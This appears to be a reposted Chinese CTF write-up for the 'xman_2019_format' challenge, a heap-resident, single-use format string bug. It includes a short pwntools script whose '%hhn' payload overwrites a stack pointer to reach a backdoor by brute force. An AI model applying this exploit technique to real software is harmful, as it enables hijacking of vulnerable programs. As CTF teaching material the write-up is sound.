码迷,mamicode.com
首页 > 其他好文 > 详细

xman_2019_format(非栈上格式化字符串仅一次利用的爆破)

时间:2020-05-20 14:10:12      阅读:106      评论:0      收藏:0      [点我收藏+]

标签:ext   一个   lan   gdb   process   格式   RoCE   isl   load   

xman_2019_format(非栈上格式化字符串仅一次利用的爆破)

首先检查一下程序的保护机制

技术图片

然后用IDA分析一下

存在后门

技术图片

首先malloc了一片堆空间,读入数据

技术图片

把刚刚读入的数据当作格式化字符串传递给printf

技术图片

这题就是考察格式话字符串不在栈上怎么利用,我们的想法就是利用栈上的数据。

首先我们把断点下在第一个printf的位置。

技术图片

由于栈的地址是随机的,成功的几率大概是1/16

from pwn import *
context.log_level = ‘debug‘
p = process(‘./xman_2019_format‘)
#gdb.attach(p,‘b *0x80485C4‘)

payload =  ‘%12c%10$hhn‘ + ‘|%172c%18$hhn|‘
payload += ‘%13c%10$hhn‘ + ‘|%133c%18$hhn‘
#print len(payload)
p.send(payload)

p.interactive()

xman_2019_format(非栈上格式化字符串仅一次利用的爆破)

标签:ext   一个   lan   gdb   process   格式   RoCE   isl   load   

原文地址:https://www.cnblogs.com/Rookle/p/12923079.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!